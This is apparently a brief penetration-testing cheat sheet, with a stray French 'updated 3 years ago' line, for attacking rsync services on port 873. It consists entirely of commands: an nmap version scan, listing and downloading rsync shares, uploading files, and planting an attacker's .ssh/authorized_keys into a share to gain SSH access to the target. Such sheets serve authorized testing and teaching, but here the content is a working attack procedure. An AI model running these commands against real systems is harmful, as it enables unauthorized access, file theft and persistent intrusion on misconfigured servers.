$ nmap -sV -p873 <target IP>
$ rsync <target IP>::
$ rsync -av --list-only rsync://<target IP>/<share>
$ rsync file <target IP>::<share>
$ rsync -av rsync://<target IP>/<share> ./rsyn_shared
Mis à jour il y a 3 ans
$ mkdir .ssh && touch .ssh/authorized_keys $ rsync -av .ssh/ rsync://<target IP>/<share>/.ssh